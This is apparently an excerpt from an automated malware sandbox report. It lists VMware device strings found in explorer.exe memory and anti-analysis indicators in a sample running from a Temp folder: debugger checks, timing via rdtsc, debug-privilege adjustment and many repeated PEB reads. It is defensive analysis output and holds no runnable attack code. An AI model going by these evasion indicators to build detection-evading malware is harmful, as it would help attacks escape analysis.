          Source: explorer.exe, 00000005.00000000.306086683.0000000008400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.296016880.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.301612924.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.279924875.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.305220626.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7A95 IsDebuggerPresent,1_2_003B7A95
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_003B558A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_003B86ED
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C962 mov eax, dword ptr fs:[00000030h]2_2_0166C962
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]2_2_0166B171
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]2_2_0166B171
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]2_2_0168B944
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]2_2_0168B944
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov ecx, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]2_2_0169513A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]2_2_0169513A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]2_2_01669100
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]2_2_01669100
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]2_2_01669100
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F41E8 mov eax, dword ptr fs:[00000030h]2_2_016F41E8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]2_2_0166B1E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]2_2_0166B1E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]2_2_0166B1E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E69A6 mov eax, dword ptr fs:[00000030h]2_2_016E69A6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]2_2_016961A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]2_2_016961A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]2_2_016E51BE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]2_2_016E51BE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]2_2_016E51BE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]2_2_016E51BE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]2_2_017249A4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]2_2_017249A4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]2_2_017249A4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]2_2_017249A4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C182 mov eax, dword ptr fs:[00000030h]2_2_0168C182
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A185 mov eax, dword ptr fs:[00000030h]2_2_0169A185
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692990 mov eax, dword ptr fs:[00000030h]2_2_01692990
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722073 mov eax, dword ptr fs:[00000030h]2_2_01722073
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731074 mov eax, dword ptr fs:[00000030h]2_2_01731074
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]2_2_01680050
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]2_2_01680050
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]2_2_01734015
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]2_2_01734015
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016658EC mov eax, dword ptr fs:[00000030h]2_2_016658EC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]2_2_0168B8E4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]2_2_0168B8E4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov ecx, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A90AF mov eax, dword ptr fs:[00000030h]2_2_016A90AF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov ecx, dword ptr fs:[00000030h]2_2_0169F0BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]2_2_0169F0BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]2_2_0169F0BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669080 mov eax, dword ptr fs:[00000030h]2_2_01669080
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]2_2_016E3884
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]2_2_016E3884
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB60 mov ecx, dword ptr fs:[00000030h]2_2_0166DB60
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]2_2_01693B7A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]2_2_01693B7A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB40 mov eax, dword ptr fs:[00000030h]2_2_0166DB40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738B58 mov eax, dword ptr fs:[00000030h]2_2_01738B58
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166F358 mov eax, dword ptr fs:[00000030h]2_2_0166F358
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172131B mov eax, dword ptr fs:[00000030h]2_2_0172131B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168DBE9 mov eax, dword ptr fs:[00000030h]2_2_0168DBE9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov eax, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]2_2_016E53CA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]2_2_016E53CA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01735BA5 mov eax, dword ptr fs:[00000030h]2_2_01735BA5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]2_2_01671B8F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]2_2_01671B8F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171D380 mov ecx, dword ptr fs:[00000030h]2_2_0171D380
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172138A mov eax, dword ptr fs:[00000030h]2_2_0172138A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169B390 mov eax, dword ptr fs:[00000030h]2_2_0169B390
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692397 mov eax, dword ptr fs:[00000030h]2_2_01692397
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A927A mov eax, dword ptr fs:[00000030h]2_2_016A927A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]2_2_0171B260
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]2_2_0171B260
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738A62 mov eax, dword ptr fs:[00000030h]2_2_01738A62
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172EA55 mov eax, dword ptr fs:[00000030h]2_2_0172EA55
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F4257 mov eax, dword ptr fs:[00000030h]2_2_016F4257
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
